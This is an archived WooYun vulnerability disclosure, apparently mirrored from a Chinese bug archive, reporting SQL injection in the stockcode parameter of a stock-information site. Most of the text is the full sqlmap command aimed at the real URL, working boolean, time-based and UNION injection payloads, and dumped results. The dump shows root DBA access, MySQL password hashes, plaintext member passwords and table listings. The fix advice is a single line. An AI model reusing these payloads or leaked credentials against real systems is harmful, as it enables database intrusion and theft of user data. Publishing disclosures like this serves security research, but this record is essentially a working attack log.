乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-19: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开
顶牛股网某处存在SQL注射漏洞(DBA权限+root密码泄露+200W股票信息泄露)
地址:http://www.dingniugu.com/ddeLine.php?stockcode=601111
python sqlmap.py -u "http://www.dingniugu.com/ddeLine.php?stockcode=601111" -p stockcode --technique=BTU --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass
Database: scms+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| ddedata | 2068057 |
Database: scmsTable: ddedata[30 columns]+----------+-------------+| Column | Type |+----------+-------------+| time | varchar(20) || bb | varchar(20) || cjgs | varchar(20) || cjl | varchar(20) || code | varchar(20) || dat | varchar(20) || ddmc | varchar(20) || ddmr | varchar(20) || ddx | varchar(20) || ddy | varchar(20) || ddz | varchar(20) || dsmc | varchar(20) || dsmr | varchar(20) || ff | varchar(20) || hh | varchar(20) || Increase | varchar(20) || junjia | varchar(20) || kaipan | varchar(20) || ltgs | varchar(20) || price | varchar(20) || shoupan | varchar(20) || tdmc | varchar(20) || tdmr | varchar(20) || xdmc | varchar(20) || xdmr | varchar(20) || zml | varchar(20) || zmml | varchar(20) || zs | varchar(20) || zuidi | varchar(20) || zuigao | varchar(20) |+----------+-------------+
---Parameter: stockcode (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: stockcode=601111' AND 8684=8684 AND 'Pobi'='Pobi Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: stockcode=601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: stockcode=-7552' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a624d646e6e545057744578744c456e42555a7a764f7667466f76434f77736556525050526e4354,0x71787a6b71)-- ----web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, PHP 5.2.5back-end DBMS: MySQL 5.0.12current user: 'root@localhost'current user is DBA: Truedatabase management system users [2]:[*] 'dingniugubbs'@'58.64.150.175'[*] 'root'@'localhost'database management system users password hashes:[*] dingniugubbs [1]: password hash: *371C0BA5302BB7C0CA17B74D106DB595839497F3[*] root [1]: password hash: *EE4A8CAEFA3CF6FD89EA134107E2D6A2755AAAB2Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 461 || COLLATION_CHARACTER_SET_APPLICABILITY | 126 || COLLATIONS | 126 || STATISTICS | 73 || KEY_COLUMN_USAGE | 54 || TABLES | 48 || CHARACTER_SETS | 36 || TABLE_CONSTRAINTS | 34 || USER_PRIVILEGES | 26 || SCHEMA_PRIVILEGES | 16 || SCHEMATA | 3 |+---------------------------------------+---------+Database: scms+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| ddedata | 2068057 || golddata | 81162 || art | 27753 || bestgourl | 3026 || ziliao | 2810 || yjyg | 2627 || nbyj | 2482 || bk | 2458 || bankcon | 781 || rmb | 183 || bank | 152 || bankll | 7 || userzxg | 3 || member | 2 |+---------------------------------------+---------+Database: mysql+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| help_relation | 825 || help_topic | 475 || help_keyword | 401 || help_category | 36 || `user` | 2 || db | 1 || func | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: scmsTable: member[1 column]+-----------------+-------------+| Column | Type |+-----------------+-------------+| member_password | varchar(32) |+-----------------+-------------+Database: mysqlTable: user[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | char(41) |+----------+----------+Database: scmsTable: member[2 entries]+-----------------+| member_password |+-----------------+| 666666 || 837400 |+-----------------+Database: mysqlTable: user[2 entries]+-------------------------------------------+| Password |+-------------------------------------------+| *371C0BA5302BB7C0CA17B74D106DB595839497F3 || *EE4A8CAEFA3CF6FD89EA134107E2D6A2755AAAB2 |+-------------------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: stockcode (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: stockcode=601111' AND 8684=8684 AND 'Pobi'='Pobi Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: stockcode=601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: stockcode=-7552' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a624d646e6e545057744578744c456e42555a7a764f7667466f76434f77736556525050526e4354,0x71787a6b71)-- ----web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, PHP 5.2.5back-end DBMS: MySQL 5.0.12available databases [3]:[*] information_schema[*] mysql[*] scmssqlmap resumed the following injection point(s) from stored session:---Parameter: stockcode (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: stockcode=601111' AND 8684=8684 AND 'Pobi'='Pobi Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: stockcode=601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: stockcode=-7552' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a624d646e6e545057744578744c456e42555a7a764f7667466f76434f77736556525050526e4354,0x71787a6b71)-- ----web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, PHP 5.2.5back-end DBMS: MySQL 5.0.12Database: scmsTable: ddedata[30 columns]+----------+-------------+| Column | Type |+----------+-------------+| time | varchar(20) || bb | varchar(20) || cjgs | varchar(20) || cjl | varchar(20) || code | varchar(20) || dat | varchar(20) || ddmc | varchar(20) || ddmr | varchar(20) || ddx | varchar(20) || ddy | varchar(20) || ddz | varchar(20) || dsmc | varchar(20) || dsmr | varchar(20) || ff | varchar(20) || hh | varchar(20) || Increase | varchar(20) || junjia | varchar(20) || kaipan | varchar(20) || ltgs | varchar(20) || price | varchar(20) || shoupan | varchar(20) || tdmc | varchar(20) || tdmr | varchar(20) || xdmc | varchar(20) || xdmr | varchar(20) || zml | varchar(20) || zmml | varchar(20) || zs | varchar(20) || zuidi | varchar(20) || zuigao | varchar(20) |+----------+-------------+
增加过滤。
未能联系到厂商或者厂商积极拒绝